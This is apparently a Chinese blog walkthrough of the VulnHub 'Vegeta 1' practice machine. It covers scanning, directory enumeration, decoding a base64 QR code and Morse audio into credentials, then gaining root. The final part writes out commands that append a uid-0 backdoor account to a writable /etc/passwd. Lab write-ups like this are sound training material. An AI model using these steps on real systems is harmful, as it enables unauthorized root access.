介绍
系列:Vegeta(此系列共1台)
发布日期:2020年6月28日
难度:低
目标:取得 root 权限 + Flag
学习:
- 主机发现
- 端口扫描
- 信息收集
- 路径枚举
- 摩尔斯码
- 数据编码还原
- 二维码解码
- 本地提权
靶机地址:https://www.vulnhub.com/entry/vegeta-1,501/
信息收集
主机发现
netdiscover主机发现
sudo netdiscover -i eth0 -r 192.168.56.0/24
主机信息探测
nmap -p- 192.168.56.128
nmap -p22,80 -A 192.168.56.128
网站探测
开局就是一个静态页面,一张贝吉塔的图片。页面源代码看不到任何有价值的信息,目录扫描吧。
目录扫描
dirsearch -u http://192.168.56.128/ --full-url -R 2 -x 404 --exclude-sizes=0B
看起来发现了一些有趣的页面,但是点开之后全都没有用。最后在robots.txt中发现了一个目录find_me,点开这个目录下唯一的文件,查看页面源代码貌似没有什么有价值的东西,但是注意到页面源代码不止4行,来到页面最新下面发现了一段像是base64编码处理的内容。
cyberchef解密
一次base64解码的结果,看起来还是base64编码的,于是再来一次base64解码。终于,在两次base64解码之后发现这是一张二维码图片。
分析二维码
最简单的方式是手机扫一扫,可以看到扫描结果“Password : topshellv”,这里再介绍其他两种分析的方法。
- 使用cyberchef。
在两次base64解码的基础上,添加一个解析二维码功能,就能得到答案
- 使用 zbar-tools
此工具包下的zbarcam是通过摄像头扫描图片的,zbarimg是直接本地扫描图片的。
这里很奇怪,不能登录SSH,线索至此中断。
二次目录爆破
对于这种情况,之前的打靶过程中碰到过,根据目录爆破的结果能拿到一点线索,然后断了。更换字典才有可能收获一些新的线索。这里开始二次爆破。结果发现了一个音频文件,下载下来播放,发现这是一段类似电报的滴滴答答的声音。
gobuster dir -r -u http://192.168.56.128/ -w /usr/share/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 100 -e
分析摩斯电码-音频
介绍2种分析的方法。最终得到用户名:trunks,密码:u$3r(摩斯密码对于英文字符,不区分大小写,用户名和密码是尝试后得知的)
- 在线网站
https://morsecode.world/international/decoder/audio-decoder-expert.html
点击“Upload”上传音频,点击“Play”播放它,待音频播放完毕,在页面下方可以看到提取出的字符信息。
- 使用音频分析软件:audacity
思路很简单,使用audacity可以看到蓝色柱状的音频线,细长的代表莫斯密码中的.,粗长的代表莫斯密码中的━,然后网上找一个莫斯密码表,自己对比翻译,或者手动把音频转为密码输进去,让网站给你翻译
sudo apt install audacity
举例网址:http://www.all-tool.cn/Tools/morse/、https://www.lddgo.net/encrypt/morse
2.1 对比翻译
根据蓝色柱状图得知去搜索莫斯密码表,发现音频表中两个细线一个粗线代表U,然后依次翻译
2.2 手工转换音频
提权
SSH登录靶机之后,基本信息收集发现了一个有趣的历史命令,我居然可以往 /etc/passwd里面写入内容,检查之后发现,我对这个文件具有写入权限,这不就是password提权吗
本来想空密码提权,还不让,那就设置个密码实现提权吧
openssl passwd -1 -salt hack hack123
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash' >> /etc/passwd
su hack
扫一扫
672
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
